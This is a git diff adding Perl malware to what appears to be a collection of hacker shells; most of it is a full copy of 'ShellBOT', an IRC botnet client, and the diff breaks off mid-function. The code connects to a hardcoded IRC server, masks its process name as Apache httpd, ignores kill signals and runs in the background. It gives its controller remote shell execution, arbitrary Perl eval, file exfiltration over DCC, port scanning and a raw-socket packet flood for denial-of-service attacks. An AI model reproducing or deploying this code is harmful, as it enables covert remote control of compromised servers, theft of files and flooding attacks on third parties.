+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+    my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+ 
diff --git a/xakep-shells/PERL/shellbot.pl.txt b/xakep-shells/PERL/shellbot.pl.txt
new file mode 100644
index 0000000..28904a0
--- /dev/null
+++ b/xakep-shells/PERL/shellbot.pl.txt
@@ -0,0 +1,704 @@
+#!/usr/bin/perl#
+###############################################################################################
+#  ShellBOT - PacktsGr0up                                                                     #                              #                    ____               _          _                                          #
+#                   |  _ \  __ _   ___ | | __ ___ | |_  ___                                   #
+#                   | |_) |/ _` | / __|| |/ // _ \| __|/ __|                                  #
+#                   |  __/| (_| || (__ |   <|  __/| |_ \__ \         m?e te amo!!                          #
+#                   |_|   _\__,_| \___||_|\_\\___| \__||___/                                  #
+#                        / ___| _ __  ___   _   _  _ __                                       #
+#                       | |  _ | '__|/ _ \ | | | || '_ \                                      #
+#                       | |_| || |  | (_) || |_| || |_) |                                     #
+#                        \____||_|   \___/  \__,_|| .__/                                      #
+#                                                 |_|                                         #
+#                                                                                             #
+#                Staff: Danilo                                                                #
+#                                                                                             #
+#adm: Danilo                                                                                  #
+###################################### CONFIGURACAO ###########################################
+my $processo = '/usr/local/apache/bin/httpd -DSSL';                       # Nome do processo que vai aparece no ps       #
+#----------------------------------------------################################################
+my $linas_max='5';                             # Evita o flood :) depois de X linhas          #
+#----------------------------------------------################################################
+my $sleep='10';                                 # ele dorme X segundos                         #
+########################################## IRC ################################################            
+my @adms=("NOD32"); # Nick do administrador                                                     #
+#----------------------------------------------################################################
+my @canais=("#SSH :2007");                 # Caso haja senha ("#hdr :hax0r")                      #
+#----------------------------------------------################################################
+my $nick='SSH-';	                       # Nick do bot. Caso esteja em uso vai aparecer #
+                                               # aparecer com numero radonamico no final      #
+#----------------------------------------------################################################
+my $ircname = 'SSH';                          # User ID                                        #
+#----------------------------------------------################################################
+chop (my $realname = `id`);                 # Full Name                                    #
+#----------------------------------------------################################################
+$servidor='208.98.16.20'  unless $servidor; # Servidor de irc que vai ser usado                #                                                                                  # caso n?o seja especificado no argumento  #                       #----------------------------------------------################################################
+my $porta='9001';                              # Porta do servidor de irc                     #
+################ ACESSO A SHELL ###############################################################
+my $secv = 1;	                               # 1/0 pra habilita/desabilita acesso a shell   #
+###############################################################################################
+
+my $VERSAO = '0.2';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+########################################################################
+# Packets®Group CoRpOrAtIoN® - conquistaremos o mundo sem sair de casa!#
+########################################################################
+#BotNet Na Veia :P #
+####################
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!nod)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!nod" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+           if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M?dia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diert?? inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
